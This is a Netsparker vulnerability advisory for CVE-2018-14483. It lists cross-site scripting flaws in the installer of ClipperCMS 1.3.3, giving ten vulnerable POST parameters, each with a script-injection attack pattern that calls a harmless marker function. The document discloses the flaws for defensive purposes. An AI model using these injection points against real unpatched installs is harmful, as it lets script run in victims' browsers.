Information
--------------------
Advisory by Netsparker
Name: Cross-site Scripting Vulnerabilities in ClipperCMS
Affected Software: ClipperCMS
Affected Versions: 1.3.3
Homepage: https://github.com/ClipperCMS/ClipperCMS
Vulnerability: Cross-site Scripting Vulnerabilities
Severity: High
Status: Not Fixed
CVE-ID: CVE-2018-14483
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-18-008
Technical Details - (Install Page)
--------------------
URL http://app.scan/ScanApp/ClipperCMS-clipper_1.3.3/install/index.php?action=options
Parameter Name cmspasswordconfirm
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>netsparker(0x001F61)</scRipt>
URL http://app.scan/ScanApp/ClipperCMS-clipper_1.3.3/install/index.php?action=options
Parameter Name cmsadminemail
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>netsparker(0x001F59)</scRipt>
URL http://app.scan/ScanApp/ClipperCMS-clipper_1.3.3/install/index.php?action=options
Parameter Name tableengine
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>netsparker(0x001F65)</scRipt>
URL http://app.scan/ScanApp/ClipperCMS-clipper_1.3.3/install/index.php?action=options
Parameter Name phpdbapi
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>netsparker(0x001F6D)</scRipt>
URL http://app.scan/ScanApp/ClipperCMS-clipper_1.3.3/install/index.php?action=options
Parameter Name cmsadmin
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>netsparker(0x001F55)</scRipt>
URL http://app.scan/ScanApp/ClipperCMS-clipper_1.3.3/install/index.php?action=options
Parameter Name database_collation
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>netsparker(0x001F69)</scRipt>
URL http://app.scan/ScanApp/ClipperCMS-clipper_1.3.3/install/index.php?action=options
Parameter Name tableprefix
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>netsparker(0x001F51)</scRipt>
URL http://app.scan/ScanApp/ClipperCMS-clipper_1.3.3/install/index.php?action=options
Parameter Name databasehost
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>netsparker(0x001E83)</scRipt>
URL http://app.scan/ScanApp/ClipperCMS-clipper_1.3.3/install/index.php?action=options
Parameter Name cmspassword
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>netsparker(0x001F5D)</scRipt>
URL http://app.scan/ScanApp/ClipperCMS-clipper_1.3.3/install/index.php?action=options
Parameter Name database_name
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>netsparker(0x001F4D)</scRipt>
For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).
Advisory Timeline
--------------------
27th November 2017 - Issue Reported
11th September 2018 - Advisory Released
Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.
About Netsparker
--------------------
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.